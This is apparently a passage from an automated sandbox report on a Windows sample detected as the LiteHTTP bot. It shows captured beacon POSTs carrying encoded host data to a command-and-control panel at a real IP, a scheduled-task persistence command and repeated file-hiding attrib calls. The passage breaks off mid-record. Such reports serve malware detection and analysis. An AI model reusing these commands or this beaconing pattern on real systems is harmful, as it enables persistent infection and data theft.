                                        Dec 17, 2024 10:22:37.504338980 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:22:37 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        15 | 192.168.2.5 | 49990 | 185.208.159.109 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 17, 2024 10:22:46.135905981 CET | 218 | OUT | POST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Dec 17, 2024 10:22:46.487687111 CET | 471 | OUT | Data Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=xVu0Qs2GDm9vhxVZdowHo65Cx6Lk570aXO~vR4zPdoU=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:22:47.413961887 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Dec 17, 2024 10:22:47.648416042 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:22:47 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        16 | 192.168.2.5 | 49991 | 185.208.159.109 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 17, 2024 10:22:55.120124102 CET | 218 | OUT | POST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Dec 17, 2024 10:22:55.472045898 CET | 471 | OUT | Data Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=Xfp4UHTAOzVRojl53ZnJ~DpOy/YqNSzD2TEmrgeCO8E=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:22:56.399256945 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Dec 17, 2024 10:22:56.632327080 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:22:56 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        17 | 192.168.2.5 | 49992 | 185.208.159.109 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 17, 2024 10:23:13.101975918 CET | 218 | OUT | POST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Dec 17, 2024 10:23:13.456403971 CET | 471 | OUT | Data Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=xVu0Qs2GDm9vhxVZdowHo65Cx6Lk570aXO~vR4zPdoU=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:23:14.379671097 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Dec 17, 2024 10:23:14.616410971 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:23:14 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        18 | 192.168.2.5 | 49993 | 185.208.159.109 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 17, 2024 10:23:20.681636095 CET | 218 | OUT | POST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Dec 17, 2024 10:23:21.034584999 CET | 471 | OUT | Data Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=Xfp4UHTAOzVRojl53ZnJ~DpOy/YqNSzD2TEmrgeCO8E=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:23:21.092236042 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Dec 17, 2024 10:23:21.449776888 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:23:20 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        19 | 192.168.2.5 | 49995 | 185.208.159.109 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 17, 2024 10:23:23.353261948 CET | 218 | OUT | POST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Dec 17, 2024 10:23:23.706594944 CET | 471 | OUT | Data Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=Xfp4UHTAOzVRojl53ZnJ~DpOy/YqNSzD2TEmrgeCO8E=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:23:24.637139082 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Dec 17, 2024 10:23:24.868328094 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:23:24 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        20 | 192.168.2.5 | 49996 | 185.208.159.109 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 17, 2024 10:23:31.639780045 CET | 218 | OUT | POST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Dec 17, 2024 10:23:31.987653017 CET | 471 | OUT | Data Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=xVu0Qs2GDm9vhxVZdowHo65Cx6Lk570aXO~vR4zPdoU=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:23:32.917309046 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Dec 17, 2024 10:23:33.153312922 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:23:32 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Target ID:0
                                        Start time:04:19:07
                                        Start date:17/12/2024
                                        Path:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0x550000
                                        File size:1'763'328 bytes
                                        MD5 hash:D37DAB4C59E707F632BB0B91EAA87FF9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.4541067680.0000000000552000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.4552402541.0000000008C02000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000003.2061776239.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.4552122250.00000000087A2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.4552952321.0000000009062000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:false

                                        Target ID:4
                                        Start time:04:20:05
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:"schtasks" /Query /TN "DQmU06kq9I"
                                        Imagebase:0xee0000
                                        File size:187'904 bytes
                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:04:20:05
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:6
                                        Start time:04:20:05
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "DQmU06kq9I" /tr "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0xee0000
                                        File size:187'904 bytes
                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:04:20:05
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:8
                                        Start time:04:20:07
                                        Start date:17/12/2024
                                        Path:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        Imagebase:0x7ff632ac0000
                                        File size:1'763'328 bytes
                                        MD5 hash:D37DAB4C59E707F632BB0B91EAA87FF9
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000008.00000002.4541316207.0000000000552000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000008.00000003.2654669900.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:false

                                        Target ID:9
                                        Start time:04:20:19
                                        Start date:17/12/2024
                                        Path:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0x550000
                                        File size:1'763'328 bytes
                                        MD5 hash:D37DAB4C59E707F632BB0B91EAA87FF9
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000009.00000003.2782245640.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000009.00000002.4552478393.0000000008BA2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000009.00000002.4541221969.0000000000552000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000009.00000002.4552255837.0000000008742000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000009.00000002.4552061627.00000000082E2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:false

                                        Target ID:10
                                        Start time:04:20:21
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):true
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0x8a0000
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:false

                                        Target ID:11
                                        Start time:04:20:21
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:12
                                        Start time:04:20:42
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):true
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0x7ff757150000
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:13
                                        Start time:04:20:42
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:14
                                        Start time:04:21:00
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):true
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0x8a0000
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:15
                                        Start time:04:21:00
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:16
                                        Start time:04:21:07
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:"schtasks" /Query /TN "DQmU06kq9I"
                                        Imagebase:0xee0000
                                        File size:187'904 bytes
                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:17
                                        Start time:04:21:07
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:18
                                        Start time:04:21:19
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):true
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0x8a0000
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:19
                                        Start time:04:21:19
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:20
                                        Start time:04:21:29
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):true
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0x7ff6068e0000
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:21
                                        Start time:04:21:29
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:22
                                        Start time:04:21:31
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):true
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0x8a0000
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:23
                                        Start time:04:21:31
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:24
                                        Start time:04:21:44
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):true
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0x8a0000
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:25
                                        Start time:04:21:44
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:26
                                        Start time:04:21:50
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):true
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0x8a0000
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:27
                                        Start time:04:21:50
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:28
                                        Start time:04:21:56
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):true
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0x8a0000
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:29
                                        Start time:04:21:56
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:30
                                        Start time:04:21:58
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:31
                                        Start time:04:21:58
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:32
                                        Start time:04:22:18
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):
                                        Commandline:"schtasks" /Query /TN "DQmU06kq9I"
                                        Imagebase:
                                        File size:187'904 bytes
                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:33
                                        Start time:04:22:19
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:34
                                        Start time:04:22:19
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:35
                                        Start time:04:22:20
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:
                                        File size:19'456 bytes
